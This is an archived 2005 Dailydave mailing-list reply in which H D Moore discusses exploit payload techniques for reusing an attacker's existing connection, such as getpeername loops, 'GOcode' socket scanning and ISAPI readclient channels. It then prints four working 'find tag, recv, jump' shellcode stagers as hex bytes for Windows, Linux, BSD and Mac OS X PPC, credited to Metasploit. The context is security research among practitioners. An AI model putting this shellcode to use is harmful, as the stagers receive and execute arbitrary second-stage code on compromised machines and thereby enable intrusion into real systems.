Dailydave mailing list archives
Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Thu, 6 Jan 2005 23:21:39 -0600
On Thursday 06 January 2005 20:57, Dave Aitel wrote:
1. LSD-style getpeername loop. [...] in fact, this is the method everyone else but Immunity and .gov.cn and a few other random people use (Halvar, for example :>), as far as I know.
Somewhat of a broad statement, NAT has made these obsolete for a while...
2. If you were at G-Con 1 several years back you [...] . The one relating to stealing sockets is his initial implementation of "GOcode". Basically it goes to each socket, sends a G down it, and waits for a sec. Then it reads one byte. If it gets an O (hence, the GOcode) then it knows it has the right socket. CANVAS uses GOcode for SPARC Solaris, Linux, and Windows. Bas Alberts spent a long time making it actually work. It sounds easy, but especially on Win32 there are a lot of "gotchas". This is usually pretty big code and maybe some people are wondering why their connection happened to get a G sent to it - but it has one major advantage: It doesn't care about NAT devices. (Various people use PEEK as a refinement on this technique).
Please see the code below. Win32 find tag shellcode, ~92 bytes and works on every version of Windows from NT 4.0 to 2003. Commented source and the associated paper should be available sometime soon.
3. If you search Google for "readclient shellcode" you can see that several Chinese exploits have been succesful at using the readclient/writeclient ISAPI functions for back communications.
This is some really interesting stuff, unfortunately all of the comments are in Chinese (and afaik nobody has translated them). It is funny how much stuff comes out of xfocus that is years ahead of the rest of the world. Maybe some day you will open-source your ECB payloads? :-) And now on to the warez (all written by metasploit staff, part of 2.3)... # win32 find tag -> recv -> jump code (92 bytes) "\xfc\x33\xff\x64\x8b\x47\x30\x8b\x40\x0c\x8b\x58\x1c\x8b\x1b\x8b" "\x73\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x75\xef\x8b\x6b" "\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c\x8b\x5c\x29\x3c" "\x03\xdd\x03\x6c\x29\x24\x57\x66\x47\x8b\xf4\x56\x68\x7f\x66\x04" "\x40\x57\xff\xd5\xad\x85\xc0\x74\xee\x99\x52\xb6\x0c\x52\x56\x57" "\xff\xd3\xad\x3d\x6d\x73\x66\x21\x75\xdd\xff\xe6"; # linux ia32 find tag -> recv -> jump code (37 bytes) "\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" "\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" "\x5f\xfc\xad\xff\xe6"; # bsd ia32 find tag -> recv -> jump code (40 bytes) "\x31\xd2\x52\x89\xe6\x52\x52\xb2\x80\x52\xb6\x0c\x52\x56\x52\x52" "\x66\xff\x46\xe8\x6a\x1d\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75" "\xef\xfc\xad\x5a\x5f\x5a\xff\xe6"; # macos x ppc find tag -> recv -> jump code (76 bytes) "\x3b\xa0\x0f\xff\x3b\xc0\x0f\xff\x37\x9d\xf0\x02\x7f\xdc\xf0\x51" "\x41\x80\xff\xf0\x38\x1d\xf0\x67\x7f\xc3\xf3\x78\x38\x81\xef\xf8" "\x38\xa0\x0f\xff\x38\xdd\xf0\x83\x44\xff\xff\x02\x7c\xc6\x32\x79" "\xa3\x61\xef\xf8\x2c\x1b\x13\x37\x40\x82\xff\xd4\x38\x81\xef\xfc" "\x7c\x89\x03\xa6\x4c\x81\x04\x20\x7c\xc6\x32\x79"; Cheers, -HD _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com https://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Dave Aitel (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Anthony . zboralski (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness H D Moore (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness halvar (Jan 07)